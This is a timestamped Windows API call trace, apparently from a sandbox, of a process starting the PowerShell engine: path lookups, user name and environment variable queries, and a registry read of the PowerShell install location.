	[0725.497] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0725.497] SetErrorMode (uMode=0x1) returned 0x1
	[0725.497] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0725.497] SetErrorMode (uMode=0x1) returned 0x1
	[0725.497] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0725.497] SetErrorMode (uMode=0x1) returned 0x1
	[0725.497] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0725.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0725.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.498] SetErrorMode (uMode=0x1) returned 0x1
	[0725.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0725.498] SetErrorMode (uMode=0x1) returned 0x1
	[0725.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.498] SetErrorMode (uMode=0x1) returned 0x1
	[0725.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0725.499] SetErrorMode (uMode=0x1) returned 0x1
	[0725.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.501] SetErrorMode (uMode=0x1) returned 0x1
	[0725.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0725.502] SetErrorMode (uMode=0x1) returned 0x1
	[0725.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.269] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0727.269] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d5f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d5f8) returned 0x1
	[0727.271] CoTaskMemFree (pv=0x1b88ccb0) 
	[0727.271] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0727.271] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d638 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d638) returned 1
	[0727.271] CoTaskMemFree (pv=0xf4470) 
	[0727.273] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f61290*="Available", lpRawData=0x2f61020) returned 1
	[0728.821] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0728.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.821] CoTaskMemFree (pv=0x139a40) 
	[0728.822] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0728.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.823] CoTaskMemFree (pv=0x139a40) 
	[0728.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.829] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0728.829] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0728.829] CoTaskMemFree (pv=0x139a40) 
	[0728.830] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0728.830] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0728.830] CoTaskMemFree (pv=0x139a40) 
	[0728.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.832] GetCurrentProcessId () returned 0xcb0
	[0728.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d618 | out: phkResult=0x26d618*=0x390) returned 0x0
	[0728.837] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d59c, lpData=0x0, lpcbData=0x26d598*=0x0 | out: lpType=0x26d59c*=0x1, lpData=0x0, lpcbData=0x26d598*=0x56) returned 0x0
	[0728.837] CoTaskMemAlloc (cb=0x5a) returned 0x1b872d80
	[0728.837] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d56c, lpData=0x1b872d80, lpcbData=0x26d568*=0x56 | out: lpType=0x26d56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d568*=0x56) returned 0x0
	[0728.837] CoTaskMemFree (pv=0x1b872d80) 
	[0728.837] RegCloseKey (hKey=0x390) returned 0x0
	[0728.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.845] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0728.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.845] CoTaskMemFree (pv=0x139a40) 
	[0728.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
